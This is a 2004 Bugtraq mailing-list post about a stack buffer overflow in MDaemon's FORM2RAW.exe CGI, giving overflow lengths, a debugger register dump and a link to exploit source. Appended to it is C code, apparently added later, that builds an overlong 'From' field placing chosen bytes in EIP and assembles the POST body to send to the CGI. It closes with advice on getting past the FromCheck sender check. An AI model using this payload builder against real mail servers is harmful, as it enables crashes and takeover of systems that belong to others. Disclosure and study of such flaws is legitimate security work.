List:       bugtraq
Subject:    Rosiello Security's exploit for MDaemon
From:       Angelo Rosiello <angelo.rosiello () katamail ! com>
Date:       2004-03-14 19:38:09
Message-ID: 20040314193809.6627.qmail () www ! securityfocus ! com
© Rosiello Security
http://www.rosiello.org


Bug found by hat-squad security.
Background text from securiteam.com.

"MDaemon offers a full range of mail server functionality. MDaemon protects your users from spam and viruses, provides full security, includes seamless web access to your email via WorldClient, remote administration, and much more!" FORM2RAW.exe is a CGI that allows users to send emails through MDaemon from a web page. It processes the fields of an HTML form and creates a raw message file in the raw queue directory of the MDaemon mail server. This file is then processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.

According to the Help file: "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the MDaemon server. If you want to disable this behavior you can set FromCheck=No in the FORM2RAW.INI file."

Sending more than 153 bytes in the "From" field to FORM2RAW.exe creates a raw file that, when processed by MDaemon, causes a stack buffer overflow. The EIP register is overwritten when the From field is 249 bytes long.


ADVISORY: http://www.rosiello.org/en/read_bugs.php?17
EXPLOIT: http://www.rosiello.org/archivio/mdaemon-exploit.c

The exploit has only been tested on Windows XP Home and Professional edition (Dutch) SP1.
The demo mode of the exploit shows the following in the debugger:

EAX = 00000000  EBX = 00000000  ECX = 014D1BD8
EDX = 01090000  ESI = 014C6000  EDI = 01AEF1A8
EIP = 42424242  ESP = 01AEEEE8  EBP = 0005E668
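The following is an added example, not the mdaemon-exploit.c linked above and not MDaemon's or Form2Raw's code. It builds a Form2Raw-style form submission whose "From" field has the length the advisory gives (249 bytes) and places four 'B' bytes where the saved return address is assumed to sit, so that a run in a debugger should show EIP = 42424242 as in the register dump above. Two things are assumptions and not taken from the page: the form field names (From, To, Subject, Body) and the exact position of the return address within the field (taken here as the last four of the 249 bytes). The advisory's 153-byte threshold and 249-byte EIP length are used as stated.

```c
/* Added demo-mode payload builder for the Form2Raw "From" overflow.
 * Not the original exploit; field names and the return-address slot
 * (last 4 bytes of a 249-byte From field) are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FROM_MAX_SAFE 153   /* advisory: more than this corrupts the stack */
#define FROM_EIP_LEN  249   /* advisory: EIP is overwritten at this length */

/* Does a From field of this length exceed the advisory's safe limit? */
int from_field_overflows(size_t from_len) {
    return from_len > FROM_MAX_SAFE;
}

/* Build a From field of exactly from_len bytes: 'A' padding followed by
 * the 4 bytes that land in EIP (assumed to be the final 4 bytes).
 * Returns a malloc'd NUL-terminated string, or NULL if too short. */
char *build_from_field(size_t from_len, const char eip[4]) {
    if (from_len < 4) return NULL;
    char *f = malloc(from_len + 1);
    if (!f) return NULL;
    memset(f, 'A', from_len - 4);
    memcpy(f + from_len - 4, eip, 4);
    f[from_len] = '\0';
    return f;
}

/* Little-endian x86: the 4 bytes popped into EIP, as the debugger prints them. */
unsigned long eip_from_bytes(const char b[4]) {
    return  (unsigned long)(unsigned char)b[0]
         | ((unsigned long)(unsigned char)b[1] << 8)
         | ((unsigned long)(unsigned char)b[2] << 16)
         | ((unsigned long)(unsigned char)b[3] << 24);
}

/* Minimal application/x-www-form-urlencoded encoder (RFC 3986 unreserved
 * characters pass through, everything else becomes %XX). Returns bytes written. */
size_t url_encode(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    if (outsz == 0) return 0;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        if (isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
            if (o + 1 >= outsz) break;
            out[o++] = (char)c;
        } else {
            if (o + 3 >= outsz) break;
            snprintf(out + o, 4, "%%%02X", c);
            o += 3;
        }
    }
    out[o] = '\0';
    return o;
}

/* Assemble the POST body sent to FORM2RAW.exe. Field names are assumed;
 * check the Form2Raw documentation for the real ones. Caller frees. */
char *build_post_body(const char *from, const char *to,
                      const char *subject, const char *body) {
    const char *names[4] = {"From", "To", "Subject", "Body"};
    const char *vals[4]  = {from, to, subject, body};
    size_t cap = 64, o = 0, i;
    for (i = 0; i < 4; i++) cap += 3 * strlen(vals[i]) + strlen(names[i]) + 2;
    char *out = malloc(cap);
    if (!out) return NULL;
    for (i = 0; i < 4; i++) {
        o += (size_t)snprintf(out + o, cap - o, "%s%s=", i ? "&" : "", names[i]);
        o += url_encode(vals[i], out + o, cap - o);
    }
    return out;
}

int main(void) {
    char *from = build_from_field(FROM_EIP_LEN, "BBBB");
    char *body = build_post_body(from, "user@example.test", "test", "demo");
    if (!from || !body) return 1;
    printf("From field: %zu bytes, overflows=%d, expected EIP=%08lX\n",
           strlen(from), from_field_overflows(strlen(from)),
           eip_from_bytes(from + FROM_EIP_LEN - 4));
    printf("POST body (%zu bytes):\n%s\n", strlen(body), body);
    free(from);
    free(body);
    return 0;
}
```

Note that the Help file quoted above says MDaemon by default refuses Form2Raw messages whose From address is not a valid local account; the page does not say whether that check runs before or after the overflowing copy, so a test setup should either use a valid account in the padded field or set FromCheck=No, and the 4-byte slot should be re-verified with a debugger rather than trusted from the assumption here.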

